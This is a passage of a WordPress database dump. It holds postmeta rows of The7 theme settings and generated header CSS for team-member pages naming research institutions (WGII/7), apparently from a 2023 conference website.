(20842,3334,'_dt_fancy_header_breadcrumbs','disabled'),
(20843,3334,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(20844,3334,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(20845,3334,'_dt_fancy_header_title_heading',''),
(20846,3334,'_dt_fancy_header_title_mode','custom'),
(20847,3334,'_dt_fancy_header_title',''),
(20848,3334,'_dt_fancy_header_title_font_size','30'),
(20849,3334,'_dt_fancy_header_title_line_height','36'),
(20850,3334,'_dt_fancy_header_text_transform','none'),
(20851,3334,'_dt_fancy_header_title_color_mode','color'),
(20852,3334,'_dt_fancy_header_title_color','#ffffff'),
(20853,3334,'_dt_fancy_header_subtitle_heading',''),
(20854,3334,'_dt_fancy_header_subtitle',''),
(20855,3334,'_dt_fancy_header_subtitle_font_size','18'),
(20856,3334,'_dt_fancy_header_subtitle_line_height','26'),
(20857,3334,'_dt_fancy_header_subtitle_text_transform','none'),
(20858,3334,'_dt_fancy_header_subtitle_color_mode','color'),
(20859,3334,'_dt_fancy_header_subtitle_color','#ffffff'),
(20860,3334,'_dt_fancy_header_bg_heading',''),
(20861,3334,'_dt_fancy_header_bg_color','#222222'),
(20862,3334,'_dt_fancy_header_bg_image_origin','featured_image'),
(20863,3334,'_dt_fancy_header_bg_image','a:0:{}'),
(20864,3334,'_dt_fancy_header_bg_repeat','no-repeat'),
(20865,3334,'_dt_fancy_header_bg_position_x','center'),
(20866,3334,'_dt_fancy_header_bg_position_y','center'),
(20867,3334,'_dt_fancy_header_bg_fullscreen','1'),
(20868,3334,'_dt_fancy_header_bg_overlay','0'),
(20869,3334,'_dt_fancy_header_overlay_color','#000'),
(20870,3334,'_dt_fancy_header_bg_overlay_opacity','50'),
(20871,3334,'_dt_fancy_header_scroll_effect','default'),
(20872,3334,'_dt_fancy_header_bg_parallax','0.5'),
(20873,3334,'_dt_fancy_header_responsiveness_heading',''),
(20874,3334,'_dt_fancy_header_responsiveness','disabled'),
(20875,3334,'_dt_fancy_header_responsiveness_switch','778px'),
(20876,3334,'_dt_fancy_header_responsive_height','70'),
(20877,3334,'_dt_fancy_header_responsive_font_size','30'),
(20878,3334,'_dt_fancy_header_responsive_title_line_height','38'),
(20879,3334,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(20880,3334,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(20881,3334,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(20882,3334,'_dt_project_options_back_button',''),
(20883,3334,'_dt_project_options_show_link',''),
(20884,3334,'_dt_project_options_link',''),
(20885,3334,'_dt_project_options_link_target',''),
(20886,3334,'_dt_project_options_link_name',''),
(20887,3334,'_dt_project_options_hide_thumbnail','1'),
(20888,3334,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(20889,3334,'_dt_project_options_related_mode','same'),
(20890,3334,'_dt_project_options_preview','normal'),
(20891,3334,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/w22m1.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(20892,3337,'_edit_lock','1669183588:1'),
(20893,3338,'_wp_attached_file','2022/11/w221.jpg'),
(20894,3338,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:70;s:6:\"height\";i:104;s:4:\"file\";s:16:\"2022/11/w221.jpg\";s:8:\"filesize\";i:17242;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20895,3337,'_thumbnail_id','3338'),
(20896,3337,'_edit_last','1'),
(20897,3337,'_dt_sidebar_position','disabled'),
(20898,3337,'_dt_sidebar_widgetarea_id','sidebar_1'),
(20899,3337,'_dt_sidebar_hide_on_mobile','0'),
(20900,3337,'_dt_footer_show','1'),
(20901,3337,'_dt_footer_widgetarea_id','sidebar_2'),
(20902,3337,'_dt_footer_hide_on_mobile','0'),
(20903,3337,'_dt_header_title','fancy'),
(20904,3337,'_dt_header_background','normal'),
(20905,3337,'_dt_header_background_below_slideshow','disabled'),
(20906,3337,'_dt_header_transparent_bg_color_scheme','light'),
(20907,3337,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(20908,3337,'_dt_header_transparent_top_bar_bg_opacity','25'),
(20909,3337,'_dt_header_transparent_bg_color','#000000'),
(20910,3337,'_dt_header_transparent_bg_opacity','50'),
(20911,3337,'_dt_header_disabled_background','normal'),
(20912,3337,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(20913,3337,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(20914,3337,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(20915,3337,'_dt_header_disabled_transparent_bg_color','#000000'),
(20916,3337,'_dt_header_disabled_transparent_bg_opacity','50'),
(20917,3337,'_dt_page_overrides_top_margin',''),
(20918,3337,'_dt_page_overrides_right_margin',''),
(20919,3337,'_dt_page_overrides_bottom_margin',''),
(20920,3337,'_dt_page_overrides_left_margin',''),
(20921,3337,'_dt_mobile_page_padding_top',''),
(20922,3337,'_dt_mobile_page_padding_right',''),
(20923,3337,'_dt_mobile_page_padding_bottom',''),
(20924,3337,'_dt_mobile_page_padding_left',''),
(20925,3337,'_dt_fancy_header_layout_heading',''),
(20926,3337,'_dt_fancy_header_title_aligment','center'),
(20927,3337,'_dt_fancy_header_height','300'),
(20928,3337,'_dt_fancy_header_padding-top','0px'),
(20929,3337,'_dt_fancy_header_padding-bottom','0px'),
(20930,3337,'_dt_fancy_header_breadcrumbs_heading',''),
(20931,3337,'_dt_fancy_header_breadcrumbs','disabled'),
(20932,3337,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(20933,3337,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(20934,3337,'_dt_fancy_header_title_heading',''),
(20935,3337,'_dt_fancy_header_title_mode','custom'),
(20936,3337,'_dt_fancy_header_title','University of Sassari (WGII/7)'),
(20937,3337,'_dt_fancy_header_title_font_size','30'),
(20938,3337,'_dt_fancy_header_title_line_height','36'),
(20939,3337,'_dt_fancy_header_text_transform','none'),
(20940,3337,'_dt_fancy_header_title_color_mode','color'),
(20941,3337,'_dt_fancy_header_title_color','#ffffff'),
(20942,3337,'_dt_fancy_header_subtitle_heading',''),
(20943,3337,'_dt_fancy_header_subtitle',''),
(20944,3337,'_dt_fancy_header_subtitle_font_size','18'),
(20945,3337,'_dt_fancy_header_subtitle_line_height','26'),
(20946,3337,'_dt_fancy_header_subtitle_text_transform','none'),
(20947,3337,'_dt_fancy_header_subtitle_color_mode','color'),
(20948,3337,'_dt_fancy_header_subtitle_color','#ffffff'),
(20949,3337,'_dt_fancy_header_bg_heading',''),
(20950,3337,'_dt_fancy_header_bg_color','#222222'),
(20951,3337,'_dt_fancy_header_bg_image_origin','custom'),
(20952,3337,'_dt_fancy_header_bg_image','a:0:{}'),
(20953,3337,'_dt_fancy_header_bg_repeat','no-repeat'),
(20954,3337,'_dt_fancy_header_bg_position_x','center'),
(20955,3337,'_dt_fancy_header_bg_position_y','center'),
(20956,3337,'_dt_fancy_header_bg_fullscreen','1'),
(20957,3337,'_dt_fancy_header_bg_overlay','0'),
(20958,3337,'_dt_fancy_header_overlay_color','#000'),
(20959,3337,'_dt_fancy_header_bg_overlay_opacity','50'),
(20960,3337,'_dt_fancy_header_scroll_effect','default'),
(20961,3337,'_dt_fancy_header_bg_parallax','0.5'),
(20962,3337,'_dt_fancy_header_responsiveness_heading',''),
(20963,3337,'_dt_fancy_header_responsiveness','disabled'),
(20964,3337,'_dt_fancy_header_responsiveness_switch','778px'),
(20965,3337,'_dt_fancy_header_responsive_height','70'),
(20966,3337,'_dt_fancy_header_responsive_font_size','30'),
(20967,3337,'_dt_fancy_header_responsive_title_line_height','38'),
(20968,3337,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(20969,3337,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(20970,3337,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(20971,3337,'_dt_teammate_options_go_to_single','1'),
(20972,3337,'_dt_teammate_options_position',''),
(20973,3337,'_dt_teammate_options_website',''),
(20974,3337,'_dt_teammate_options_mail',''),
(20975,3337,'_dt_teammate_options_facebook',''),
(20976,3337,'_dt_teammate_options_twitter',''),
(20977,3337,'_dt_teammate_options_dribbble',''),
(20978,3337,'_dt_teammate_options_you-tube',''),
(20979,3337,'_dt_teammate_options_rss',''),
(20980,3337,'_dt_teammate_options_delicious',''),
(20981,3337,'_dt_teammate_options_flickr',''),
(20982,3337,'_dt_teammate_options_lastfm',''),
(20983,3337,'_dt_teammate_options_linkedin',''),
(20984,3337,'_dt_teammate_options_vimeo',''),
(20985,3337,'_dt_teammate_options_tumbler',''),
(20986,3337,'_dt_teammate_options_pinterest',''),
(20987,3337,'_dt_teammate_options_devian',''),
(20988,3337,'_dt_teammate_options_skype',''),
(20989,3337,'_dt_teammate_options_github',''),
(20990,3337,'_dt_teammate_options_instagram',''),
(20991,3337,'_dt_teammate_options_stumbleupon',''),
(20992,3337,'_dt_teammate_options_behance',''),
(20993,3337,'_dt_teammate_options_px-500',''),
(20994,3337,'_dt_teammate_options_tripedvisor',''),
(20995,3337,'_dt_teammate_options_vk',''),
(20996,3337,'_dt_teammate_options_foursquare',''),
(20997,3337,'_dt_teammate_options_xing',''),
(20998,3337,'_dt_teammate_options_weibo',''),
(20999,3337,'_dt_teammate_options_odnoklassniki',''),
(21000,3337,'_dt_teammate_options_research-gate',''),
(21001,3337,'_dt_teammate_options_yelp',''),
(21002,3337,'_dt_teammate_options_blogger',''),
(21003,3337,'_dt_teammate_options_soundcloud',''),
(21004,3337,'_dt_teammate_options_viber',''),
(21005,3337,'_dt_teammate_options_whatsapp',''),
(21006,3337,'_dt_teammate_options_reddit',''),
(21007,3337,'_dt_teammate_options_snapchat',''),
(21008,3337,'_dt_teammate_options_telegram',''),
(21009,3337,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(21010,3339,'_edit_lock','1669183674:1'),
(21011,3340,'_wp_attached_file','2022/11/w222.jpg'),
(21012,3340,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:83;s:6:\"height\";i:111;s:4:\"file\";s:16:\"2022/11/w222.jpg\";s:8:\"filesize\";i:21008;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21013,3339,'_thumbnail_id','3340'),
(21014,3339,'_edit_last','1'),
(21015,3339,'_dt_sidebar_position','disabled'),
(21016,3339,'_dt_sidebar_widgetarea_id','sidebar_1'),
(21017,3339,'_dt_sidebar_hide_on_mobile','0'),
(21018,3339,'_dt_footer_show','1'),
(21019,3339,'_dt_footer_widgetarea_id','sidebar_2'),
(21020,3339,'_dt_footer_hide_on_mobile','0'),
(21021,3339,'_dt_header_title','fancy'),
(21022,3339,'_dt_header_background','normal'),
(21023,3339,'_dt_header_background_below_slideshow','disabled'),
(21024,3339,'_dt_header_transparent_bg_color_scheme','light'),
(21025,3339,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(21026,3339,'_dt_header_transparent_top_bar_bg_opacity','25'),
(21027,3339,'_dt_header_transparent_bg_color','#000000'),
(21028,3339,'_dt_header_transparent_bg_opacity','50'),
(21029,3339,'_dt_header_disabled_background','normal'),
(21030,3339,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(21031,3339,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(21032,3339,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(21033,3339,'_dt_header_disabled_transparent_bg_color','#000000'),
(21034,3339,'_dt_header_disabled_transparent_bg_opacity','50'),
(21035,3339,'_dt_page_overrides_top_margin',''),
(21036,3339,'_dt_page_overrides_right_margin',''),
(21037,3339,'_dt_page_overrides_bottom_margin',''),
(21038,3339,'_dt_page_overrides_left_margin',''),
(21039,3339,'_dt_mobile_page_padding_top',''),
(21040,3339,'_dt_mobile_page_padding_right',''),
(21041,3339,'_dt_mobile_page_padding_bottom',''),
(21042,3339,'_dt_mobile_page_padding_left',''),
(21043,3339,'_dt_fancy_header_layout_heading',''),
(21044,3339,'_dt_fancy_header_title_aligment','center'),
(21045,3339,'_dt_fancy_header_height','300'),
(21046,3339,'_dt_fancy_header_padding-top','0px'),
(21047,3339,'_dt_fancy_header_padding-bottom','0px'),
(21048,3339,'_dt_fancy_header_breadcrumbs_heading',''),
(21049,3339,'_dt_fancy_header_breadcrumbs','disabled'),
(21050,3339,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(21051,3339,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(21052,3339,'_dt_fancy_header_title_heading',''),
(21053,3339,'_dt_fancy_header_title_mode','custom'),
(21054,3339,'_dt_fancy_header_title','FBK - Bruno Kessler Foundation (WGII/7)'),
(21055,3339,'_dt_fancy_header_title_font_size','30'),
(21056,3339,'_dt_fancy_header_title_line_height','36'),
(21057,3339,'_dt_fancy_header_text_transform','none'),
(21058,3339,'_dt_fancy_header_title_color_mode','color'),
(21059,3339,'_dt_fancy_header_title_color','#ffffff'),
(21060,3339,'_dt_fancy_header_subtitle_heading',''),
(21061,3339,'_dt_fancy_header_subtitle',''),
(21062,3339,'_dt_fancy_header_subtitle_font_size','18'),
(21063,3339,'_dt_fancy_header_subtitle_line_height','26'),
(21064,3339,'_dt_fancy_header_subtitle_text_transform','none'),
(21065,3339,'_dt_fancy_header_subtitle_color_mode','color'),
(21066,3339,'_dt_fancy_header_subtitle_color','#ffffff'),
(21067,3339,'_dt_fancy_header_bg_heading',''),
(21068,3339,'_dt_fancy_header_bg_color','#222222'),
(21069,3339,'_dt_fancy_header_bg_image_origin','custom'),
(21070,3339,'_dt_fancy_header_bg_image','a:0:{}'),
(21071,3339,'_dt_fancy_header_bg_repeat','no-repeat'),
(21072,3339,'_dt_fancy_header_bg_position_x','center'),
(21073,3339,'_dt_fancy_header_bg_position_y','center'),
(21074,3339,'_dt_fancy_header_bg_fullscreen','1'),
(21075,3339,'_dt_fancy_header_bg_overlay','0'),
(21076,3339,'_dt_fancy_header_overlay_color','#000'),
(21077,3339,'_dt_fancy_header_bg_overlay_opacity','50'),
(21078,3339,'_dt_fancy_header_scroll_effect','default'),
(21079,3339,'_dt_fancy_header_bg_parallax','0.5'),
(21080,3339,'_dt_fancy_header_responsiveness_heading',''),
(21081,3339,'_dt_fancy_header_responsiveness','disabled'),
(21082,3339,'_dt_fancy_header_responsiveness_switch','778px'),
(21083,3339,'_dt_fancy_header_responsive_height','70'),
(21084,3339,'_dt_fancy_header_responsive_font_size','30'),
(21085,3339,'_dt_fancy_header_responsive_title_line_height','38'),
(21086,3339,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(21087,3339,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(21088,3339,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(21089,3339,'_dt_teammate_options_go_to_single','1'),
(21090,3339,'_dt_teammate_options_position',''),
(21091,3339,'_dt_teammate_options_website',''),
(21092,3339,'_dt_teammate_options_mail',''),
(21093,3339,'_dt_teammate_options_facebook',''),
(21094,3339,'_dt_teammate_options_twitter',''),
(21095,3339,'_dt_teammate_options_dribbble',''),
(21096,3339,'_dt_teammate_options_you-tube',''),
(21097,3339,'_dt_teammate_options_rss',''),
(21098,3339,'_dt_teammate_options_delicious',''),
(21099,3339,'_dt_teammate_options_flickr',''),
(21100,3339,'_dt_teammate_options_lastfm',''),
(21101,3339,'_dt_teammate_options_linkedin',''),
(21102,3339,'_dt_teammate_options_vimeo',''),
(21103,3339,'_dt_teammate_options_tumbler',''),
(21104,3339,'_dt_teammate_options_pinterest',''),
(21105,3339,'_dt_teammate_options_devian',''),
(21106,3339,'_dt_teammate_options_skype',''),
(21107,3339,'_dt_teammate_options_github',''),
(21108,3339,'_dt_teammate_options_instagram',''),
(21109,3339,'_dt_teammate_options_stumbleupon',''),
(21110,3339,'_dt_teammate_options_behance',''),
(21111,3339,'_dt_teammate_options_px-500',''),
(21112,3339,'_dt_teammate_options_tripedvisor',''),
(21113,3339,'_dt_teammate_options_vk',''),
(21114,3339,'_dt_teammate_options_foursquare',''),
(21115,3339,'_dt_teammate_options_xing',''),
(21116,3339,'_dt_teammate_options_weibo',''),
(21117,3339,'_dt_teammate_options_odnoklassniki',''),
(21118,3339,'_dt_teammate_options_research-gate',''),
(21119,3339,'_dt_teammate_options_yelp',''),
(21120,3339,'_dt_teammate_options_blogger',''),
(21121,3339,'_dt_teammate_options_soundcloud',''),
(21122,3339,'_dt_teammate_options_viber',''),
(21123,3339,'_dt_teammate_options_whatsapp',''),
(21124,3339,'_dt_teammate_options_reddit',''),
(21125,3339,'_dt_teammate_options_snapchat',''),
(21126,3339,'_dt_teammate_options_telegram',''),
(21127,3339,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(21128,3341,'_edit_lock','1669183751:1'),
(21129,3342,'_wp_attached_file','2022/11/w223.jpg'),
(21130,3342,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:80;s:6:\"height\";i:104;s:4:\"file\";s:16:\"2022/11/w223.jpg\";s:8:\"filesize\";i:19036;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21131,3341,'_thumbnail_id','3342'),
(21132,3341,'_edit_last','1'),
(21133,3341,'_dt_sidebar_position','disabled'),
(21134,3341,'_dt_sidebar_widgetarea_id','sidebar_1'),
(21135,3341,'_dt_sidebar_hide_on_mobile','0'),
(21136,3341,'_dt_footer_show','1'),
(21137,3341,'_dt_footer_widgetarea_id','sidebar_2'),
(21138,3341,'_dt_footer_hide_on_mobile','0'),
(21139,3341,'_dt_header_title','fancy'),
(21140,3341,'_dt_header_background','normal'),
(21141,3341,'_dt_header_background_below_slideshow','disabled'),
(21142,3341,'_dt_header_transparent_bg_color_scheme','light'),
(21143,3341,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(21144,3341,'_dt_header_transparent_top_bar_bg_opacity','25'),
(21145,3341,'_dt_header_transparent_bg_color','#000000'),
(21146,3341,'_dt_header_transparent_bg_opacity','50'),
(21147,3341,'_dt_header_disabled_background','normal'),
(21148,3341,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(21149,3341,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(21150,3341,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(21151,3341,'_dt_header_disabled_transparent_bg_color','#000000'),
(21152,3341,'_dt_header_disabled_transparent_bg_opacity','50'),
(21153,3341,'_dt_page_overrides_top_margin',''),
(21154,3341,'_dt_page_overrides_right_margin',''),
(21155,3341,'_dt_page_overrides_bottom_margin',''),
(21156,3341,'_dt_page_overrides_left_margin',''),
(21157,3341,'_dt_mobile_page_padding_top',''),
(21158,3341,'_dt_mobile_page_padding_right',''),
(21159,3341,'_dt_mobile_page_padding_bottom',''),
(21160,3341,'_dt_mobile_page_padding_left',''),
(21161,3341,'_dt_fancy_header_layout_heading',''),
(21162,3341,'_dt_fancy_header_title_aligment','center'),
(21163,3341,'_dt_fancy_header_height','300'),
(21164,3341,'_dt_fancy_header_padding-top','0px'),
(21165,3341,'_dt_fancy_header_padding-bottom','0px'),
(21166,3341,'_dt_fancy_header_breadcrumbs_heading',''),
(21167,3341,'_dt_fancy_header_breadcrumbs','enabled'),
(21168,3341,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(21169,3341,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(21170,3341,'_dt_fancy_header_title_heading',''),
(21171,3341,'_dt_fancy_header_title_mode','custom'),
(21172,3341,'_dt_fancy_header_title','Cyprus University of Technology (WGII/7)'),
(21173,3341,'_dt_fancy_header_title_font_size','30'),
(21174,3341,'_dt_fancy_header_title_line_height','36'),
(21175,3341,'_dt_fancy_header_text_transform','none'),
(21176,3341,'_dt_fancy_header_title_color_mode','color'),
(21177,3341,'_dt_fancy_header_title_color','#ffffff'),
(21178,3341,'_dt_fancy_header_subtitle_heading',''),
(21179,3341,'_dt_fancy_header_subtitle',''),
(21180,3341,'_dt_fancy_header_subtitle_font_size','18'),
(21181,3341,'_dt_fancy_header_subtitle_line_height','26'),
(21182,3341,'_dt_fancy_header_subtitle_text_transform','none'),
(21183,3341,'_dt_fancy_header_subtitle_color_mode','color'),
(21184,3341,'_dt_fancy_header_subtitle_color','#ffffff'),
(21185,3341,'_dt_fancy_header_bg_heading',''),
(21186,3341,'_dt_fancy_header_bg_color','#222222'),
(21187,3341,'_dt_fancy_header_bg_image_origin','custom'),
(21188,3341,'_dt_fancy_header_bg_image','a:0:{}'),
(21189,3341,'_dt_fancy_header_bg_repeat','no-repeat'),
(21190,3341,'_dt_fancy_header_bg_position_x','center'),
(21191,3341,'_dt_fancy_header_bg_position_y','center'),
(21192,3341,'_dt_fancy_header_bg_fullscreen','1'),
(21193,3341,'_dt_fancy_header_bg_overlay','0'),
(21194,3341,'_dt_fancy_header_overlay_color','#000'),
(21195,3341,'_dt_fancy_header_bg_overlay_opacity','50'),
(21196,3341,'_dt_fancy_header_scroll_effect','default'),
(21197,3341,'_dt_fancy_header_bg_parallax','0.5'),
(21198,3341,'_dt_fancy_header_responsiveness_heading',''),
(21199,3341,'_dt_fancy_header_responsiveness','disabled'),
(21200,3341,'_dt_fancy_header_responsiveness_switch','778px'),
(21201,3341,'_dt_fancy_header_responsive_height','70'),
(21202,3341,'_dt_fancy_header_responsive_font_size','30'),
(21203,3341,'_dt_fancy_header_responsive_title_line_height','38'),
(21204,3341,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(21205,3341,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(21206,3341,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(21207,3341,'_dt_teammate_options_go_to_single','1'),
(21208,3341,'_dt_teammate_options_position',''),
(21209,3341,'_dt_teammate_options_website',''),
(21210,3341,'_dt_teammate_options_mail',''),
(21211,3341,'_dt_teammate_options_facebook',''),
(21212,3341,'_dt_teammate_options_twitter',''),
(21213,3341,'_dt_teammate_options_dribbble',''),
(21214,3341,'_dt_teammate_options_you-tube',''),
(21215,3341,'_dt_teammate_options_rss',''),
(21216,3341,'_dt_teammate_options_delicious',''),
(21217,3341,'_dt_teammate_options_flickr',''),
(21218,3341,'_dt_teammate_options_lastfm',''),
(21219,3341,'_dt_teammate_options_linkedin',''),
(21220,3341,'_dt_teammate_options_vimeo',''),
(21221,3341,'_dt_teammate_options_tumbler',''),
(21222,3341,'_dt_teammate_options_pinterest',''),
(21223,3341,'_dt_teammate_options_devian',''),
(21224,3341,'_dt_teammate_options_skype',''),
(21225,3341,'_dt_teammate_options_github',''),
(21226,3341,'_dt_teammate_options_instagram',''),
